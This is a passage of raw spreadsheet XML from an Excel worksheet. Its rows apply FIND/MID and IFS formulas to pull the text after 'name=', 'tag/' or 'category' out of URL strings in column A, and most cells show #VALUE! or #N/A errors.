        <v>#N/A</v>
      </c>
    </row>
    <row r="3510" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3510" t="s">
        <v>2403</v>
      </c>
      <c r="B3510" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3510" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3510" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3510" t="e" cm="1">
        <f t="array" ref="E3510">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3510)), MID($A3510, FIND("name=",$A3510) + 5, LEN($A3510) - FIND("name=",$A3510)),
    ISNUMBER(FIND("tag/",$A3510)), MID($A3510, FIND("tag/",$A3510) + 4, LEN($A3510) - FIND("tag/",$A3510)),
    ISNUMBER(FIND("category",$A3510)), MID($A3510, FIND("category",$A3510) + 9, LEN($A3510) - FIND("category",$A3510)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3510" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3511" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3511" t="s">
        <v>2377</v>
      </c>
      <c r="B3511" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3511" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3511" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3511" t="e" cm="1">
        <f t="array" ref="E3511">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3511)), MID($A3511, FIND("name=",$A3511) + 5, LEN($A3511) - FIND("name=",$A3511)),
    ISNUMBER(FIND("tag/",$A3511)), MID($A3511, FIND("tag/",$A3511) + 4, LEN($A3511) - FIND("tag/",$A3511)),
    ISNUMBER(FIND("category",$A3511)), MID($A3511, FIND("category",$A3511) + 9, LEN($A3511) - FIND("category",$A3511)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3511" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3512" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3512" t="s">
        <v>2403</v>
      </c>
      <c r="B3512" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3512" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3512" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3512" t="e" cm="1">
        <f t="array" ref="E3512">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3512)), MID($A3512, FIND("name=",$A3512) + 5, LEN($A3512) - FIND("name=",$A3512)),
    ISNUMBER(FIND("tag/",$A3512)), MID($A3512, FIND("tag/",$A3512) + 4, LEN($A3512) - FIND("tag/",$A3512)),
    ISNUMBER(FIND("category",$A3512)), MID($A3512, FIND("category",$A3512) + 9, LEN($A3512) - FIND("category",$A3512)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3512" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3513" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3513" t="s">
        <v>2377</v>
      </c>
      <c r="B3513" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3513" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3513" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3513" t="e" cm="1">
        <f t="array" ref="E3513">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3513)), MID($A3513, FIND("name=",$A3513) + 5, LEN($A3513) - FIND("name=",$A3513)),
    ISNUMBER(FIND("tag/",$A3513)), MID($A3513, FIND("tag/",$A3513) + 4, LEN($A3513) - FIND("tag/",$A3513)),
    ISNUMBER(FIND("category",$A3513)), MID($A3513, FIND("category",$A3513) + 9, LEN($A3513) - FIND("category",$A3513)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3513" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3514" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3514" t="s">
        <v>2601</v>
      </c>
      <c r="B3514" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3514" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3514" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3514" t="e" cm="1">
        <f t="array" ref="E3514">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3514)), MID($A3514, FIND("name=",$A3514) + 5, LEN($A3514) - FIND("name=",$A3514)),
    ISNUMBER(FIND("tag/",$A3514)), MID($A3514, FIND("tag/",$A3514) + 4, LEN($A3514) - FIND("tag/",$A3514)),
    ISNUMBER(FIND("category",$A3514)), MID($A3514, FIND("category",$A3514) + 9, LEN($A3514) - FIND("category",$A3514)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3514" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3515" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3515" t="s">
        <v>2248</v>
      </c>
      <c r="B3515" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3515" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3515" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3515" t="e" cm="1">
        <f t="array" ref="E3515">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3515)), MID($A3515, FIND("name=",$A3515) + 5, LEN($A3515) - FIND("name=",$A3515)),
    ISNUMBER(FIND("tag/",$A3515)), MID($A3515, FIND("tag/",$A3515) + 4, LEN($A3515) - FIND("tag/",$A3515)),
    ISNUMBER(FIND("category",$A3515)), MID($A3515, FIND("category",$A3515) + 9, LEN($A3515) - FIND("category",$A3515)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3515" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3516" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3516" t="s">
        <v>2395</v>
      </c>
      <c r="B3516" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3516" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3516" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3516" t="e" cm="1">
        <f t="array" ref="E3516">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3516)), MID($A3516, FIND("name=",$A3516) + 5, LEN($A3516) - FIND("name=",$A3516)),
    ISNUMBER(FIND("tag/",$A3516)), MID($A3516, FIND("tag/",$A3516) + 4, LEN($A3516) - FIND("tag/",$A3516)),
    ISNUMBER(FIND("category",$A3516)), MID($A3516, FIND("category",$A3516) + 9, LEN($A3516) - FIND("category",$A3516)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3516" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3517" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3517" t="s">
        <v>2396</v>
      </c>
      <c r="B3517" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3517" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3517" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3517" t="e" cm="1">
        <f t="array" ref="E3517">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3517)), MID($A3517, FIND("name=",$A3517) + 5, LEN($A3517) - FIND("name=",$A3517)),
    ISNUMBER(FIND("tag/",$A3517)), MID($A3517, FIND("tag/",$A3517) + 4, LEN($A3517) - FIND("tag/",$A3517)),
    ISNUMBER(FIND("category",$A3517)), MID($A3517, FIND("category",$A3517) + 9, LEN($A3517) - FIND("category",$A3517)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3517" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3518" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3518" t="s">
        <v>2413</v>
      </c>
      <c r="B3518" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3518" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3518" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3518" t="e" cm="1">
        <f t="array" ref="E3518">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3518)), MID($A3518, FIND("name=",$A3518) + 5, LEN($A3518) - FIND("name=",$A3518)),
    ISNUMBER(FIND("tag/",$A3518)), MID($A3518, FIND("tag/",$A3518) + 4, LEN($A3518) - FIND("tag/",$A3518)),
    ISNUMBER(FIND("category",$A3518)), MID($A3518, FIND("category",$A3518) + 9, LEN($A3518) - FIND("category",$A3518)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3518" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3519" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3519" t="s">
        <v>2397</v>
      </c>
      <c r="B3519" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3519" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3519" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3519" t="e" cm="1">
        <f t="array" ref="E3519">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3519)), MID($A3519, FIND("name=",$A3519) + 5, LEN($A3519) - FIND("name=",$A3519)),
    ISNUMBER(FIND("tag/",$A3519)), MID($A3519, FIND("tag/",$A3519) + 4, LEN($A3519) - FIND("tag/",$A3519)),
    ISNUMBER(FIND("category",$A3519)), MID($A3519, FIND("category",$A3519) + 9, LEN($A3519) - FIND("category",$A3519)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3519" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3520" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3520" t="s">
        <v>2396</v>
      </c>
      <c r="B3520" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3520" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3520" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3520" t="e" cm="1">
        <f t="array" ref="E3520">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3520)), MID($A3520, FIND("name=",$A3520) + 5, LEN($A3520) - FIND("name=",$A3520)),
    ISNUMBER(FIND("tag/",$A3520)), MID($A3520, FIND("tag/",$A3520) + 4, LEN($A3520) - FIND("tag/",$A3520)),
    ISNUMBER(FIND("category",$A3520)), MID($A3520, FIND("category",$A3520) + 9, LEN($A3520) - FIND("category",$A3520)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3520" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3521" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3521" t="s">
        <v>2396</v>
      </c>
      <c r="B3521" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3521" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3521" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3521" t="e" cm="1">
        <f t="array" ref="E3521">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3521)), MID($A3521, FIND("name=",$A3521) + 5, LEN($A3521) - FIND("name=",$A3521)),
    ISNUMBER(FIND("tag/",$A3521)), MID($A3521, FIND("tag/",$A3521) + 4, LEN($A3521) - FIND("tag/",$A3521)),
    ISNUMBER(FIND("category",$A3521)), MID($A3521, FIND("category",$A3521) + 9, LEN($A3521) - FIND("category",$A3521)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3521" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3522" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3522" t="s">
        <v>2413</v>
      </c>
      <c r="B3522" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3522" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3522" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3522" t="e" cm="1">
        <f t="array" ref="E3522">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3522)), MID($A3522, FIND("name=",$A3522) + 5, LEN($A3522) - FIND("name=",$A3522)),
    ISNUMBER(FIND("tag/",$A3522)), MID($A3522, FIND("tag/",$A3522) + 4, LEN($A3522) - FIND("tag/",$A3522)),
    ISNUMBER(FIND("category",$A3522)), MID($A3522, FIND("category",$A3522) + 9, LEN($A3522) - FIND("category",$A3522)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3522" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3523" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3523" t="s">
        <v>2413</v>
      </c>
      <c r="B3523" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3523" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3523" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3523" t="e" cm="1">
        <f t="array" ref="E3523">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3523)), MID($A3523, FIND("name=",$A3523) + 5, LEN($A3523) - FIND("name=",$A3523)),
    ISNUMBER(FIND("tag/",$A3523)), MID($A3523, FIND("tag/",$A3523) + 4, LEN($A3523) - FIND("tag/",$A3523)),
    ISNUMBER(FIND("category",$A3523)), MID($A3523, FIND("category",$A3523) + 9, LEN($A3523) - FIND("category",$A3523)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3523" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3524" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3524" t="s">
        <v>2818</v>
      </c>
      <c r="B3524" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3524" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3524" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3524" t="e" cm="1">
        <f t="array" ref="E3524">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3524)), MID($A3524, FIND("name=",$A3524) + 5, LEN($A3524) - FIND("name=",$A3524)),
    ISNUMBER(FIND("tag/",$A3524)), MID($A3524, FIND("tag/",$A3524) + 4, LEN($A3524) - FIND("tag/",$A3524)),
    ISNUMBER(FIND("category",$A3524)), MID($A3524, FIND("category",$A3524) + 9, LEN($A3524) - FIND("category",$A3524)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3524" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3525" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3525" t="s">
        <v>2818</v>
      </c>
      <c r="B3525" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3525" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3525" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3525" t="e" cm="1">
        <f t="array" ref="E3525">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3525)), MID($A3525, FIND("name=",$A3525) + 5, LEN($A3525) - FIND("name=",$A3525)),
    ISNUMBER(FIND("tag/",$A3525)), MID($A3525, FIND("tag/",$A3525) + 4, LEN($A3525) - FIND("tag/",$A3525)),
    ISNUMBER(FIND("category",$A3525)), MID($A3525, FIND("category",$A3525) + 9, LEN($A3525) - FIND("category",$A3525)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3525" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3526" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3526" t="s">
        <v>2826</v>
      </c>
      <c r="B3526" t="str">
        <f t="shared" ref="B3526:B3589" si="166">IF(FIND("name=",A3526,1)&gt;0,MID(A3526,FIND("name=",A3526,1)+5,LEN(A3526)-FIND("name=",A3526,1)),"")</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3526" t="e">
        <f t="shared" ref="C3526:C3589" si="167">IF(FIND("tag/",$A3526,1)&gt;0,MID($A3526,FIND("tag/",$A3526,1)+4,LEN($A3526)-FIND("tag/",$A3526,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3526" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3526" t="str" cm="1">
        <f t="array" ref="E3526">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3526)), MID($A3526, FIND("name=",$A3526) + 5, LEN($A3526) - FIND("name=",$A3526)),
    ISNUMBER(FIND("tag/",$A3526)), MID($A3526, FIND("tag/",$A3526) + 4, LEN($A3526) - FIND("tag/",$A3526)),
    ISNUMBER(FIND("category",$A3526)), MID($A3526, FIND("category",$A3526) + 9, LEN($A3526) - FIND("category",$A3526)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3526" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3527" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3527" t="s">
        <v>2826</v>
      </c>
      <c r="B3527" t="str">
        <f t="shared" si="166"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3527" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3527" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3527" t="str" cm="1">
        <f t="array" ref="E3527">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3527)), MID($A3527, FIND("name=",$A3527) + 5, LEN($A3527) - FIND("name=",$A3527)),
    ISNUMBER(FIND("tag/",$A3527)), MID($A3527, FIND("tag/",$A3527) + 4, LEN($A3527) - FIND("tag/",$A3527)),
    ISNUMBER(FIND("category",$A3527)), MID($A3527, FIND("category",$A3527) + 9, LEN($A3527) - FIND("category",$A3527)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3527" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3528" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3528" t="s">
        <v>2601</v>
      </c>
      <c r="B3528" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3528" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3528" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3528" t="e" cm="1">
        <f t="array" ref="E3528">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3528)), MID($A3528, FIND("name=",$A3528) + 5, LEN($A3528) - FIND("name=",$A3528)),
    ISNUMBER(FIND("tag/",$A3528)), MID($A3528, FIND("tag/",$A3528) + 4, LEN($A3528) - FIND("tag/",$A3528)),
    ISNUMBER(FIND("category",$A3528)), MID($A3528, FIND("category",$A3528) + 9, LEN($A3528) - FIND("category",$A3528)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3528" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3529" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3529" t="s">
        <v>2826</v>
      </c>
      <c r="B3529" t="str">
        <f t="shared" si="166"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3529" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3529" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3529" t="str" cm="1">
        <f t="array" ref="E3529">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3529)), MID($A3529, FIND("name=",$A3529) + 5, LEN($A3529) - FIND("name=",$A3529)),
    ISNUMBER(FIND("tag/",$A3529)), MID($A3529, FIND("tag/",$A3529) + 4, LEN($A3529) - FIND("tag/",$A3529)),
    ISNUMBER(FIND("category",$A3529)), MID($A3529, FIND("category",$A3529) + 9, LEN($A3529) - FIND("category",$A3529)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3529" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3530" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3530" t="s">
        <v>2826</v>
      </c>
      <c r="B3530" t="str">
        <f t="shared" si="166"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3530" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3530" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3530" t="str" cm="1">
        <f t="array" ref="E3530">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3530)), MID($A3530, FIND("name=",$A3530) + 5, LEN($A3530) - FIND("name=",$A3530)),
    ISNUMBER(FIND("tag/",$A3530)), MID($A3530, FIND("tag/",$A3530) + 4, LEN($A3530) - FIND("tag/",$A3530)),
    ISNUMBER(FIND("category",$A3530)), MID($A3530, FIND("category",$A3530) + 9, LEN($A3530) - FIND("category",$A3530)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3530" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3531" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3531" t="s">
        <v>2826</v>
      </c>
      <c r="B3531" t="str">
        <f t="shared" si="166"/>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="C3531" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3531" t="e">
        <f t="shared" ref="D3531:D3594" si="168">IF(FIND("category",$A3531,1)&gt;0,MID($A3531,FIND("category",$A3531,1)+9,LEN($A3531)-FIND("category",$A3531,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3531" t="str" cm="1">
        <f t="array" ref="E3531">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3531)), MID($A3531, FIND("name=",$A3531) + 5, LEN($A3531) - FIND("name=",$A3531)),
    ISNUMBER(FIND("tag/",$A3531)), MID($A3531, FIND("tag/",$A3531) + 4, LEN($A3531) - FIND("tag/",$A3531)),
    ISNUMBER(FIND("category",$A3531)), MID($A3531, FIND("category",$A3531) + 9, LEN($A3531) - FIND("category",$A3531)))</f>
        <v>Sumi%20Chitra%2037</v>
      </c>
      <c r="F3531" t="s">
        <v>3380</v>
      </c>
    </row>
    <row r="3532" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3532" t="s">
        <v>2413</v>
      </c>
      <c r="B3532" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3532" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3532" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3532" t="e" cm="1">
        <f t="array" ref="E3532">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3532)), MID($A3532, FIND("name=",$A3532) + 5, LEN($A3532) - FIND("name=",$A3532)),
    ISNUMBER(FIND("tag/",$A3532)), MID($A3532, FIND("tag/",$A3532) + 4, LEN($A3532) - FIND("tag/",$A3532)),
    ISNUMBER(FIND("category",$A3532)), MID($A3532, FIND("category",$A3532) + 9, LEN($A3532) - FIND("category",$A3532)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3532" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3533" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3533" t="s">
        <v>2377</v>
      </c>
      <c r="B3533" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3533" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3533" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3533" t="e" cm="1">
        <f t="array" ref="E3533">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3533)), MID($A3533, FIND("name=",$A3533) + 5, LEN($A3533) - FIND("name=",$A3533)),
    ISNUMBER(FIND("tag/",$A3533)), MID($A3533, FIND("tag/",$A3533) + 4, LEN($A3533) - FIND("tag/",$A3533)),
    ISNUMBER(FIND("category",$A3533)), MID($A3533, FIND("category",$A3533) + 9, LEN($A3533) - FIND("category",$A3533)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3533" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3534" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3534" t="s">
        <v>2403</v>
      </c>
      <c r="B3534" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3534" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3534" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3534" t="e" cm="1">
        <f t="array" ref="E3534">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3534)), MID($A3534, FIND("name=",$A3534) + 5, LEN($A3534) - FIND("name=",$A3534)),
    ISNUMBER(FIND("tag/",$A3534)), MID($A3534, FIND("tag/",$A3534) + 4, LEN($A3534) - FIND("tag/",$A3534)),
    ISNUMBER(FIND("category",$A3534)), MID($A3534, FIND("category",$A3534) + 9, LEN($A3534) - FIND("category",$A3534)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3534" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3535" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3535" t="s">
        <v>2377</v>
      </c>
      <c r="B3535" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3535" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3535" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3535" t="e" cm="1">
        <f t="array" ref="E3535">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3535)), MID($A3535, FIND("name=",$A3535) + 5, LEN($A3535) - FIND("name=",$A3535)),
    ISNUMBER(FIND("tag/",$A3535)), MID($A3535, FIND("tag/",$A3535) + 4, LEN($A3535) - FIND("tag/",$A3535)),
    ISNUMBER(FIND("category",$A3535)), MID($A3535, FIND("category",$A3535) + 9, LEN($A3535) - FIND("category",$A3535)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3535" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3536" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3536" t="s">
        <v>2403</v>
      </c>
      <c r="B3536" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3536" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3536" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3536" t="e" cm="1">
        <f t="array" ref="E3536">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3536)), MID($A3536, FIND("name=",$A3536) + 5, LEN($A3536) - FIND("name=",$A3536)),
    ISNUMBER(FIND("tag/",$A3536)), MID($A3536, FIND("tag/",$A3536) + 4, LEN($A3536) - FIND("tag/",$A3536)),
    ISNUMBER(FIND("category",$A3536)), MID($A3536, FIND("category",$A3536) + 9, LEN($A3536) - FIND("category",$A3536)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3536" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3537" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3537" t="s">
        <v>2377</v>
      </c>
      <c r="B3537" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3537" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3537" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3537" t="e" cm="1">
        <f t="array" ref="E3537">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3537)), MID($A3537, FIND("name=",$A3537) + 5, LEN($A3537) - FIND("name=",$A3537)),
    ISNUMBER(FIND("tag/",$A3537)), MID($A3537, FIND("tag/",$A3537) + 4, LEN($A3537) - FIND("tag/",$A3537)),
    ISNUMBER(FIND("category",$A3537)), MID($A3537, FIND("category",$A3537) + 9, LEN($A3537) - FIND("category",$A3537)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3537" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3538" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3538" t="s">
        <v>2403</v>
      </c>
      <c r="B3538" t="e">
        <f t="shared" si="166"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3538" t="e">
        <f t="shared" si="167"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3538" t="e">
        <f t="shared" si="168"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3538" t="e" cm="1">
        <f t="array" ref="E3538">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3538)), MID($A3538, FIND("name=",$A3538) + 5, LEN($A3538) - FIND("name=",$A3538)),
    ISNUMBER(FIND("tag/",$A3538)), MID($A3538, FIND("tag/",$A3538) + 4, LEN($A3538) - FIND("tag/",$A3538)),
